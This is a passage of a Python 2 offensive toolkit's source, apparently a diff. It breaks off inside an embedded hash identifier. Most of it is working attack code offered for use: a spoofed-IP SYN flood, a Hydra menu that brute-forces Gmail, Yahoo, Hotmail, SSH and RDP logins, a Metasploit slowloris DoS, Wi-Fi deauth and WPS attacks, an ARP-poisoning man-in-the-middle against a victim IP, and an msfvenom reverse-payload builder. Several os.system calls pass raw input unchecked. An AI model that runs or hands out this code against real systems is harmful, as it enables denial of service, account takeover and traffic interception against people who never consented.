() - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() - -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" - -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') - -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def arppois(): - - try: - os.system("iwconfig") - interface = raw_input("[*] Enter Interface: ") - victimIP = raw_input("[*] Enter Victim IP: ") - gateIP = raw_input("[*] Enter Router IP: ") - except KeyboardInterrupt: - print "\n[*] User Requested Shutdown" - print "[*] Exiting..." - os.system("clear") - mainbanner() - - print "\n[*] Enabling IP Forwarding...\n" - os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") - - def get_mac(IP): - conf.verb = 0 - ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) - for snd,rcv in ans: - return rcv.sprintf(r"%Ether.src%") - - def reARP(): - - print "\n[*] Restoring Targets..." - victimMAC = get_mac(victimIP) - gateMAC = get_mac(gateIP) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) - print "[*] Disabling IP Forwarding..." - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[*] Shutting Down..." - os.system("clear") - mainbanner() - - def trick(gm, vm): - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) - - def mitm(): - try: - victimMAC = get_mac(victimIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Victim MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - try: - gateMAC = get_mac(gateIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Gateway MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - print "[*] Poisoning Targets..." - while 1: - try: - trick(gateMAC, victimMAC) - time.sleep(1.5) - except KeyboardInterrupt: - reARP() - break - mitm() -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if 